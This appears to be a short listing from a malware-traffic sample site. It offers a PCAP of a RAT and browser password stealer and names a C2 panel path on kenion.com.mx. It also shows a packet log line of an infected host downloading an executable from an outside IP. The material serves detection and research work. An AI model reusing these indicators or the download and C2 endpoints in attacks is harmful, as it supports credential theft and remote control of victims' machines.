POST /xx/Panel/fre.php kenion.com.mx RAT Browser Password Stealer Malware PCAP file download Traffic Sample

  017-11-29 20:01:13.251874 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 3799269095:3799269589, ack 1911259101, win 256, length 494: HTTP: GET /doro/xxcryptrd.exe HTTP/1.1 E…8?@……..fl..+.a.P.t>.q…P….H..GET /doro/xxcryptrd.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, …

Read More